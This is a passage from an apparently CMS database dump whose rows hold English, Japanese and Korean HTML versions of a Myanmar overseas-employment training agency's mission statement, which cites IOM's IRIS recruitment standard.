Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 229, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html'),
('page', 0, 26, 229, 'ja', 0, '<p class=\"MsoNormal\"><o:p></o:p></p><p>我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。<br>会社と労働者の間に損失がないようにInternational Organization for Migration (IOM)が定めたInternational Recruitment Integrity System(IRIS)に合った基準で管理しております。<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 229, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 233, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html'),
('page', 0, 26, 233, 'ja', 0, '<p class=\"MsoNormal\"><o:p></o:p></p><p>我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。<br>会社と労働者の間に損失がないようにInternational Organization for Migration (IOM)が定めたInternational Recruitment Integrity System(IRIS)に合った基準で管理しております。<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 233, 'ko', 0, '<p class=\"MsoNormal\"><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun 